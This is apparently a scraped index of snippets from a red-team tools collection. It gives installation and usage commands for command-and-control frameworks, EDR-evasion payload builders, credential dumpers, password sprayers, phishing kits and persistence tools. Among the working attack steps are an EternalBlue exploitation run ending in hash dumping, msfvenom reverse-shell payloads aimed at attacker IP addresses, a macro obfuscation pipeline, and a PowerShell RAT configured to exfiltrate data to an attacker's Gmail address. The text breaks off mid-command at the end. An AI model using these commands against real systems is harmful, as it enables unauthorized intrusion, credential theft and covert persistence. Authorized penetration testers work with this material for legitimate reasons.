### Covenant .NET C2 Framework Installation and Server Start Source: https://context7.com/a-poc/redteam-tools/llms.txt Steps to clone the Covenant C2 Framework, including submodules, and start the Covenant server. Provides the URL for accessing the web interface and outlines the initial setup steps. ```bash # Installation git clone --recurse-submodules https://github.com/cobbr/Covenant cd Covenant/Covenant # Start Covenant server dotnet run # Access web interface at https://127.0.0.1:7443 # Register initial user account # Create listener (HTTP/HTTPS/Bridge) # Generate launcher (PowerShell/Binary/MSBuild/etc) # Deploy to target and establish grunt session # Execute tasks through web interface ``` -------------------------------- ### Havoc C2 Framework Installation and Teamserver Setup Source: https://context7.com/a-poc/redteam-tools/llms.txt Steps to clone, build, and run the Havoc C2 Framework. Includes instructions for installing the client, starting the teamserver with a specified profile, and a high-level overview of payload generation and interaction. ```bash # Installation (Ubuntu)git clone https://github.com/HavocFramework/Havoc.git cd Havoc/Client make ./Havoc # Start teamserver cd ../Teamserver ./Install.sh make sudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug # Generate payload through GUI # Configure listener (HTTP/HTTPS/SMB) # Create demon agent with desired options # Deploy to target system # Interact through Havoc client interface ``` -------------------------------- ### Install Veil (Git) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs Veil from its Git repository, including dependencies and the setup script for configuration. ```bash sudo apt-get -y install git git clone https://github.com/Veil-Framework/Veil.git cd Veil/ ./config/setup.sh --force --silent ``` -------------------------------- ### Install GitHarvester Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Clones the GitHarvester repository from GitHub and navigates into the created directory. This is the initial setup step for using the tool. ```bash git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester ``` -------------------------------- ### Install Veil (Kali) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the Veil framework on Kali Linux using apt and then runs the setup script for silent configuration. ```bash apt -y install veil /usr/share/veil/config/setup.sh --force --silent ``` -------------------------------- ### Usage Examples for Subzy Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Demonstrates how to use Subzy to check for subdomain takeovers against a list of subdomains or single/multiple targets. Requires Subzy to be installed. ```bash # List of subdomains ./subzy run --targets list.txt # Single or multiple targets ./subzy run --target test.google.com ./subzy run --target test.google.com,https://test.yahoo.com ``` -------------------------------- ### Install NimPlant Framework Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the NimPlant framework by first setting up the Nim programming language environment, cloning the repository, installing Nimble dependencies, and installing Python requirements for the server. It also installs the MinGW-w64 cross-compiler for Windows targets. ```bash curl https://nim-lang.org/choosenim/init.sh -sSf | sh choosenim stable git clone https://github.com/chvancooten/NimPlant cd client nimble install -d pip3 install -r server/requirements.txt apt install mingw-w64 ``` -------------------------------- ### Install and Build ScareCrow (Go) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs ScareCrow by cloning the repository, installing Go dependencies, and building the main executable. Requires Go 1.16.1+, openssl, osslsigncode, and mingw-w64. ```bash git clone https://github.com/optiv/ScareCrow cd ScareCrow go get github.com/fatih/color go get github.com/yeka/zip go get github.com/josephspurrier/goversioninfo # Required openssl osslsigncode mingw-w64 # Build go build ScareCrow.go ``` -------------------------------- ### Install kerbrute using Go Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the kerbrute tool using the Go programming language's get command. This method is suitable for Go development environments. ```bash go get github.com/ropnop/kerbrute ``` -------------------------------- ### Install Social Engineer Toolkit (SET) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the Social Engineer Toolkit (SET) by cloning the repository and running the setup script. SET is a framework for creating social engineering campaigns and attack vectors. ```bash git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install ``` -------------------------------- ### Install TruffleHog (Go) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs TruffleHog using Go by cloning the repository and executing 'go install'. This method requires Go to be installed on the system. ```bash git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install ``` -------------------------------- ### Usage Examples for reconFTW Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Provides examples for using reconFTW to perform reconnaissance on single domains, multiple domains from a list, passive reconnaissance, and comprehensive checks with exploitation. Assumes reconFTW is installed. ```bash # Single target domain ./reconftw.sh -d target.com -r # One target with multiple domains ./reconftw.sh -m target -l domains.txt -r # Passive recon ./reconftw.sh -d target.com -p # Perform all checks and exploitations ./reconftw.sh -d target.com -a ``` -------------------------------- ### Metasploit Framework Installation and Basic Usage Source: https://context7.com/a-poc/redteam-tools/llms.txt Instructions for installing the Metasploit Framework using a provided script, starting the console, searching for exploits, configuring and running an exploit (MS17-010 EternalBlue), and basic post-exploitation commands. ```bash curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall ./msfinstall msfconsole search type:exploit platform:windows smb use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.10 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.5 exploit getuid sysinfo hashdump screenshot ``` -------------------------------- ### Install kerbrute using Make Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs kerbrute by cloning the repository and compiling the binary using 'make all'. This approach is common for Go projects. ```bash git clone https://github.com/ropnop/kerbrute cd kerbrute make all ``` -------------------------------- ### Install Pupy Framework using Git Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the Pupy framework from its Git repository. Requires several development libraries and tools. After cloning, it prompts to create a workspace. ```bash sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv git clone --recursive https://github.com/n1nj4sec/pupy cd pupy python create-workspace.py -DG pupyw ``` -------------------------------- ### Install Gowitness (Go) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the Gowitness website screenshot utility using the Go programming language's package manager. This command fetches and builds the Gowitness executable. ```bash go install github.com/sensepost/gowitness@latest ``` -------------------------------- ### Install adidnsdump using Git and Pip Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs adidnsdump by cloning the repository and then using pip. This method allows for local modifications before installation. ```bash git clone https://github.com/dirkjanm/adidnsdump cd adidnsdump pip install . ``` -------------------------------- ### Install ADFSpoof Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the ADFSpoof tool by cloning the repository and installing its Python dependencies. Requires a custom fork of the Python Cryptography package. ```bash git clone https://github.com/mandiant/ADFSpoof pip install -r requirements.txt ``` -------------------------------- ### Install BeRoot (Linux) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Clones the BeRoot repository and navigates into the Linux-specific directory for installation on Linux systems. ```bash git clone https://github.com/AlessandroZ/BeRoot cd BeRoot/Linux/ ``` -------------------------------- ### Install Gitrob (Go) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the Gitrob tool using the Go programming language's package manager. This command fetches and builds the Gitrob executable. ```bash go get github.com/michenriksen/gitrob ``` -------------------------------- ### Install Evil-WinRM via Git Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the Evil-WinRM tool by cloning the repository from GitHub and installing its dependencies. This method is suitable for development or if the gem installation fails. ```bash sudo gem install winrm winrm-fs stringio logger fileutils git clone https://github.com/Hackplayers/evil-winrm.git cd evil-winrm ``` -------------------------------- ### Install Subzy Subdomain Takeover Tool Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs Subzy, a Go-based tool for detecting subdomain takeovers by matching response fingerprints. Uses `go install` for installation. ```bash go install -v github.com/PentestPad/subzy@latest ``` -------------------------------- ### Install Metabigor Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the Metabigor OSINT tool using the Go programming language's package manager. Ensure Go is installed and configured. ```bash go install github.com/j3ssie/metabigor@latest ``` -------------------------------- ### Usage Examples for smtp-user-enum Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Shows basic usage patterns for smtp-user-enum, including specifying target host, port, and accessing help or version information. Assumes the tool is installed. ```bash smtp-user-enum [options] -u/-U host port smtp-user-enum --help smtp-user-enum --version ``` -------------------------------- ### Usage Examples for Certify (C#) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Command-line examples for using the Certify tool to identify vulnerable Active Directory Certificate Services (AD CS) templates and to request new certificates with specified alternate principals. ```bash Certify.exe find /vulnerable ``` ```bash Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin ``` -------------------------------- ### Install Enum4linux (Git) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs enum4linux by cloning the Git repository and navigating into the directory. This method is useful if the apt version is outdated or unavailable. ```bash git clone https://github.com/CiscoCXSecurity/enum4linux cd enum4linux ``` -------------------------------- ### ScareCrow Usage Examples (Go) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Demonstrates various ways to use the ScareCrow payload creation framework, specifying loader types and output file names. Supports different loader types like binary, dll, excel, and more. ```bash # Example: Generate a DLL payload ./ScareCrow -I payload.bin -Loader dll # Example: Generate a JScript loader for Excel sideloading ./ScareCrow -I payload.bin -Loader excel -O loader.js # Example: Generate a binary payload with console output ./ScareCrow -I payload.bin -Loader binary -console ``` -------------------------------- ### Install Scavenger and Prerequisites Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the Scavenger tool by first ensuring CrackMapExec is installed and then cloning the Scavenger repository. Scavenger is a post-exploitation tool. ```bash git clone https://github.com/SpiderLabs/scavenger cd scavenger ``` -------------------------------- ### Ligolo-ng Proxy Server Setup Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Commands to set up and configure the ligolo-ng proxy server. Includes options for help and automatic certificate generation using Let's Encrypt. ```bash ./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates ``` -------------------------------- ### Install Macro_pack using Git Source: https://github.com/a-poc/redteam-tools/blob/main/README.md This snippet shows how to clone the Macro_pack repository and install its dependencies using pip. It requires Git to be installed and a Python 3 environment with pip. ```bash git clone https://github.com/sevagas/macro_pack.git cd macro_pack pip3 install -r requirements.txt ``` -------------------------------- ### Install and Build Freeze Payload Creation Tool (Go) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the Freeze tool by cloning the repository, navigating into the directory, and building the executable. Freeze is a payload creation tool designed to bypass EDR security controls for stealthy shellcode execution. ```bash git clone https://github.com/optiv/Freeze cd Freeze go build Freeze.go ``` -------------------------------- ### Install SquarePhish Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the SquarePhish tool by cloning the repository and installing its Python dependencies. SquarePhish is an advanced phishing tool utilizing OAuth Device Code authentication and QR codes. ```bash git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt ``` -------------------------------- ### PowerSploit PowerShell Modules for Post-Exploitation Source: https://context7.com/a-poc/redteam-tools/llms.txt Guide on installing and using PowerSploit, a collection of PowerShell modules for post-exploitation. Shows how to import modules, run Mimikatz for credential dumping, enumerate domain information, find local admin access, and enumerate shares. ```powershell # Installation # Download PowerSploit folder to PowerShell modules directory # Check module path $Env:PSModulePath # Import module Import-Module PowerSploit # Invoke Mimikatz in memory Invoke-Mimikatz -DumpCreds # Enumerate domain information Get-NetDomainController Get-NetUser Get-NetGroup "Domain Admins" Get-NetComputer # Find local admin access Find-LocalAdminAccess # Enumerate shares Invoke-ShareFinder # Expected output includes domain users, groups, computers, and access paths ``` -------------------------------- ### Install PsExec (PowerShell) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs PsExec by downloading the Sysinternals suite, expanding it, moving psexec.exe, and cleaning up. Requires PowerShell and internet access. ```powershell Invoke-WebRequest -Uri 'https://download.sysinternals.com/files/PSTools.zip' -OutFile 'pstools.zip' Expand-Archive -Path 'pstools.zip' -DestinationPath "$env:TEMP\pstools" Move-Item -Path "$env:TEMP\pstools\psexec.exe" . Remove-Item -Path "$env:TEMP\pstools" -Recurse ``` -------------------------------- ### Install adidnsdump using Pip Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the adidnsdump tool using pip from a GitHub repository. This is a convenient way to install the tool and its dependencies. ```bash pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump ``` -------------------------------- ### Install Skanuvaty Wordlist Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Provides commands to install wordlists for use with Skanuvaty. It shows how to install common wordlist packages and lists available wordlists. ```bash # Install a wordlist sudo apt install wordlists ls /usr/share/dirb/wordlists ls /usr/share/amass/wordlists ``` -------------------------------- ### Start Pupy Shell Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Starts the Pupy shell environment. It involves setting the PATH environment variable and then executing the pupysh script. ```bash export PATH=$PATH:~/.local/bin; pupysh pupyws/bin/pupysh ``` -------------------------------- ### Run SpiderFoot OSINT Tool Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Starts the SpiderFoot OSINT automation tool, listening on the specified IP address and port. This is a Python script that requires SpiderFoot to be installed. ```python python3 ./sf.py -l 127.0.0.1:5001 ``` -------------------------------- ### Install ADRecon using Git Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Clones the ADRecon repository from GitHub to install the tool. This is the primary method for obtaining the latest version of ADRecon. ```bash git clone https://github.com/sense-of-security/ADRecon.git ``` -------------------------------- ### Install PowerLessShell (Bash) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md This command clones the PowerLessShell repository and navigates into the directory. Ensure git is installed. ```bash git clone https://github.com/Mr-Un1k0d3r/PowerLessShell cd PowerLessShell ``` -------------------------------- ### Obfuscate VBA with Macro_pack Source: https://github.com/a-poc/redteam-tools/blob/main/README.md This example demonstrates how to use Macro_pack to obfuscate a VBA file generated by msfvenom. The output is saved to a new VBA file. It requires msfvenom and Macro_pack to be installed. ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba ``` -------------------------------- ### Install reconFTW Reconnaissance Tool Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs reconFTW, a tool that automates reconnaissance, subdomain enumeration, and vulnerability checks. It involves cloning the repository and executing an install script. ```bash git clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh ``` -------------------------------- ### Install Impacket for secretsdump Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the Impacket library, which is required for the secretsdump utility. This command uses pip to install the package. ```bash python3 -m pip install impacket ``` -------------------------------- ### SharPersist Usage Examples Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Demonstrates how to use the SharPersist tool to add persistence mechanisms on a Windows system. Examples include persistence via KeePass, Registry, Scheduled Tasks, and the Startup Folder. ```bash #KeePass SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add #Registry SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add #Scheduled Task Backdoor SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add #Startup Folder SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add ``` -------------------------------- ### Audit for Vulnerabilities with SharpUp Source: https://github.com/a-poc/redteam-tools/blob/main/README.md This example shows how to use the SharpUp tool to audit a victim's endpoint for various vulnerabilities. The 'audit' command runs all checks, while specific arguments like 'HijackablePaths' can narrow the scope. ```bash SharpUp.exe audit SharpUp.exe HijackablePaths SharpUp.exe audit HijackablePaths ``` -------------------------------- ### Install Enum4linux (Apt) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the enum4linux tool using the apt package manager. This is a common method for Debian-based Linux distributions. ```bash sudo apt install enum4linux ``` -------------------------------- ### Gowitness: Serve Report Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Starts the Gowitness report server, making the generated screenshots and findings accessible through a web interface. This command is used after running scans. ```bash gowitness report serve ``` -------------------------------- ### Install SpiderFoot OSINT Tool Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs SpiderFoot, an open-source intelligence automation tool, using wget to download the archive, tar to extract it, and pip3 to install dependencies. Requires Python 3. ```bash wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz tar zxvf v4.0.tar.gz cd spiderfoot-4.0 pip3 install -r requirements.txt ``` -------------------------------- ### Usage Examples for TREVORspray Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Provides examples of how to use TREVORspray for reconnaissance, enumerating users via OneDrive, and spraying passwords against discovered accounts. ```bash # Recon python3 ./trevorspray --recon evilcorp.com # Enumerate users via OneDrive python3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10 # Spray against discovered python3 ./trevorspray -u emails.txt -p 'Welcome123' --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token ``` -------------------------------- ### Interact with Pupy Sessions and Commands Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Demonstrates basic Pupy command-line usage, including getting help for commands, interacting with a specific session, and running local shell commands. ```bash # Get help page for any builtin commands with -h >> sessions -h >> jobs -h >> run -h # Interact with session 1 >> sessions -i 1 # Run local command 'ls' >> !ls ``` -------------------------------- ### Install CrackMapExec (Bash) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md CrackMapExec is a tool for pivoting in Windows/Active Directory environments. This command installs it using apt. It requires root privileges. ```bash sudo apt install crackmapexec ``` -------------------------------- ### Msfvenom Payload Generation Examples Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Provides examples of using msfvenom to generate payloads for different operating systems and formats. This includes PHP, Windows executables, Linux ELF files, Java JSP shells, and HTA files, all configured for reverse TCP connections. ```bash msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R ``` ```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe ``` ```bash msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf ``` ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp ``` ```bash msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta ``` -------------------------------- ### Install CredMaster Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Instructions for installing the CredMaster tool, which is used for password spraying and brute-force attacks against AWS endpoints. It requires cloning the repository and installing dependencies via pip. ```bash git clone https://github.com/knavesec/CredMaster;cd CredMaster;pip install -r requirements.txt ``` -------------------------------- ### Install Alcatraz Dependencies (vcpkg) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs necessary x64 Windows dependencies for Alcatraz, an x64 binary obfuscator, using the vcpkg package manager. This step is required before compiling or using Alcatraz. ```bash vcpkg.exe install asmjit:x64-windows vcpkg.exe install zydis:x64-windows ``` -------------------------------- ### Install PowerSploit as a PowerShell Module Source: https://github.com/a-poc/redteam-tools/blob/main/README.md These commands demonstrate how to install PowerSploit as a PowerShell module. It involves bypassing the execution policy and importing the module. Ensure PowerSploit is downloaded to the correct module path. ```powershell powershell.exe -ep bypass Import-Module PowerSploit ``` -------------------------------- ### Install King Phisher Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs King Phisher on Linux systems by downloading and executing an installation script. King Phisher is a tool for creating and sending phishing emails with features for campaign management and customizable templates. ```bash wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && \ sudo bash ./install.sh ``` -------------------------------- ### Install Shellter on Kali Linux Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the Shellter dynamic shellcode injection tool on Kali Linux using the apt-get package manager. This command updates the package list and then installs Shellter. ```bash apt-get update apt-get install shellter ``` -------------------------------- ### Install and Use feroxbuster Forced Browsing Tool (Windows) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md This command installs feroxbuster on Windows by downloading the latest release, extracting it, and then verifying the installation. It uses PowerShell for web requests and archive expansion. ```powershell Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip Expand-Archive .\feroxbuster.zip .\feroxbuster\feroxbuster.exe -V ``` -------------------------------- ### Install and Use feroxbuster Forced Browsing Tool (Mac) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md This command installs feroxbuster on macOS using a script from GitHub. It downloads and executes a setup script to install the tool. ```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash ``` -------------------------------- ### Install WMIOps (PowerShell) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md WMIOps is a PowerShell module for performing various actions on Windows hosts using WMI. Installation involves cloning the repository and importing the module. PowerShell must be available. ```powershell git clone https://github.com/FortyNorthSecurity/WMIOps Import-Module WMIOps.ps1 ``` -------------------------------- ### Install Responder Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Clones the Responder tool repository from GitHub and navigates into the directory. Responder is used for poisoning LLMNR and NBT-NS protocols to capture credentials and potentially execute arbitrary code. ```bash git clone https://github.com/SpiderLabs/Responder#usage cd Responder ``` -------------------------------- ### Install TREVORspray Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Command to install the TREVORspray tool, a modular password sprayer with advanced features like threading and SSH proxying, using pip. ```bash pip install https://github.com/blacklanternsecurity/TREVORspray ``` -------------------------------- ### Install Hydra Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the Hydra tool on Debian-based systems using apt. Hydra is a popular tool for performing brute-force login attacks against various services. ```bash sudo apt install hydra ``` -------------------------------- ### Install and Use Sherlock (PowerShell) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Instructions for installing and utilizing the Sherlock PowerShell script to detect missing software patches that could be exploited for local privilege escalation. It supports numerous specific Microsoft security advisories (MS) and CVEs. ```bash # Git install git clone https://github.com/rasta-mouse/Sherlock # Load powershell module Import-Module -Name C:\\INSTALL_LOCATION\\Sherlock\\Sherlock.ps1 ``` ```powershell # Run all functions Find-AllVulns # Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference) Find-MS14058 ``` -------------------------------- ### Usage Examples for CredMaster Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Demonstrates how to use CredMaster for password spraying and brute-force attacks, either by specifying configuration parameters directly or by using a configuration file. ```bash python3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs} python3 credmaster.py --config config.json ``` -------------------------------- ### Execute Payload on Victim Endpoint Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Starts the execution of a downloaded payload executable on the victim machine using PowerShell's Start-Process cmdlet. ```powershell Start-Process "shell-name.exe" ``` -------------------------------- ### Install Invoke-Obfuscation Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Clones the Invoke-Obfuscation repository from GitHub. This tool is used for obfuscating PowerShell commands and scripts. ```bash git clone https://github.com/danielbohannon/Invoke-Obfuscation.git ``` -------------------------------- ### Install moonwalk on Linux (Bash) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Downloads the moonwalk binary for Linux and makes it executable. This tool is used for clearing traces on Unix systems during penetration testing. ```bash curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk chmod +x moonwalk ``` -------------------------------- ### Install Mangle Dependencies (Go) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the 'pe' debug package required for Mangle, a tool that manipulates compiled executables. This command is run using Go's package manager. ```bash go get github.com/Binject/debug/pe ``` -------------------------------- ### Install Chimera PowerShell Obfuscation Script Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs the Chimera PowerShell obfuscation script and its dependencies on Debian-based systems. It clones the repository, sets ownership, and makes the script executable. Dependencies include sed, xxd, libc-bin, curl, jq, perl, gawk, grep, coreutils, and git. ```bash sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help ``` -------------------------------- ### Powershell RAT: Setup and Usage Source: https://github.com/a-poc/redteam-tools/blob/main/README.md This section outlines the setup for Powershell RAT, a Python-based backdoor that uses Gmail for data exfiltration and screen capture. It requires configuring a throwaway Gmail account and modifying PowerShell script variables. ```powershell # Ensure Gmail account has 'Allow less secure apps' enabled. # Modify variables in Mail.ps1: # $username = "your_email@gmail.com" # $password = "your_app_password" # $msg.From = "your_email@gmail.com" # $msg.To.Add("attacker_email@gmail.com") ``` -------------------------------- ### Use SquarePhish Server Module Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Starts the server module for SquarePhish to handle incoming phishing connections. This module is crucial for capturing authentication tokens after the victim interacts with the QR code and OAuth flow. ```python python squish.py server -c settings.config --debug ``` -------------------------------- ### Install and Run SpiderFoot OSINT Tool Source: https://context7.com/a-poc/redteam-tools/llms.txt Installs SpiderFoot, an open-source intelligence automation tool, using pip and starts its web interface for reconnaissance and target profiling. It requires Python 3 and network access to data sources. ```bash # Installation wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz tar zxvf v4.0.tar.gz cd spiderfoot-4.0 pip3 install -r requirements.txt # Start the web interface python3 ./sf.py -l 127.0.0.1:5001 # Access the interface at http://127.0.0.1:5001 # Configure a scan target through the web UI # Select desired modules (DNS, WHOIS, Social Media, etc.) # Monitor results in real-time as SpiderFoot discovers information ``` -------------------------------- ### Install remoteInjector Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Clones the remoteInjector repository from GitHub and navigates into the newly created directory. This tool is used for injecting remote templates into Word documents. ```bash git clone https://github.com/JohnWoodman/remoteinjector;cd remoteinjector ``` -------------------------------- ### Scan Subnet with Dismap Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Scans the specified subnet using Dismap. This example shows basic scanning and options for outputting to files and controlling host discovery. ```bash # Scan 192.168.1.1 subnet ./dismap -i 192.168.1.1/24 # Scan, output to result.txt and json output to result.json ./dismap -i 192.168.1.1/24 -o result.txt -j result.json # Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds ./dismap -i 192.168.1.1/24 --np --timeout 10 # Scan, Number of concurrent threads 1000 ./dismap -i 192.168.1.1/24 -t 1000 ``` -------------------------------- ### Install and Use USBKill Anti-Forensic Tool Source: https://github.com/a-poc/redteam-tools/blob/main/README.md USBKill is an anti-forensic utility that monitors USB port status and shuts down the system if any change is detected, preventing unauthorized data transfer. Installation involves cloning the repository and running the setup script. Usage requires root privileges. ```bash git clone https://github.com/hephaest0s/usbkill cd usbkill ./setup.py install ``` ```bash sudo python3 usbkill.py ``` -------------------------------- ### Install and Use gobuster Directory Brute-Forcer Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Gobuster is a tool for brute-forcing directories and files on a web server. It is typically installed via system package managers. Usage involves specifying the target URL, a wordlist, and options for handling responses and threads. ```bash sudo apt install gobuster ``` ```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20 ``` -------------------------------- ### Install and Run WinPEAS on Windows (PowerShell) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Execute WinPEAS, a verbose privilege escalation tool for Windows endpoints, using PowerShell. This command downloads the executable, loads it into memory, and runs the main program to find local privilege escalation routes. ```powershell $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("") ``` -------------------------------- ### Install SCOMDecrypt (PowerShell) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md SCOMDecrypt is a tool to retrieve and decrypt RunAs credentials from SCOM databases. This command clones the repository and then sources the main PowerShell script for installation/execution. ```powershell git clone https://github.com/nccgroup/SCOMDecrypt cd .\SCOMDecrypt\SCOMDecrypt\ . .\Invoke-SCOMDecrypt.ps1 ``` -------------------------------- ### Mimikatz Basic Usage (Batch) Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Shows the initial steps to run Mimikatz and enable necessary privileges for credential dumping on a Windows endpoint. Requires administrative privileges. ```batch .\mimikatz.exe privilege::debug ``` -------------------------------- ### Launch laZagne Software Script Source: https://github.com/a-poc/redteam-tools/blob/main/README.md laZagne can also launch specific software scripts for credential retrieval. This example demonstrates launching the script for Firefox, targeting Firefox-specific stored passwords. ```bash .\laZagne.exe browsers -firefox ``` -------------------------------- ### Get Hashcat Help Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Hashcat is a powerful password cracking tool that supports numerous hashing algorithms. This command displays the help menu, providing information on its various options and usage. ```bash .\hashcat.exe --help ``` -------------------------------- ### Fix Pupy Installation with rpyc Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Installs a specific version of the 'rpyc' library to resolve potential installation errors with Pupy. ```bash sudo pip2 install rpyc==3.4.4 ``` -------------------------------- ### Bash One-liner for Subdomain Reconnaissance and Screenshots Source: https://github.com/a-poc/redteam-tools/blob/main/README.md A bash one-liner that uses curl and pup to fetch subdomains from crt.sh, httprobe to verify their existence, and EyeWitness to screenshot them. Requires httprobe, pup, and EyeWitness to be installed. Replace DOMAIN_COM with the target domain. ```bash domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web ``` -------------------------------- ### Download and Prepare linux-smart-enumeration on Linux Source: https://github.com/a-poc/redteam-tools/blob/main/README.md Download the linux-smart-enumeration script (lse.sh) and make it executable. This tool provides a less verbose but effective way to enumerate privilege escalation opportunities on Linux systems. ```bash curl 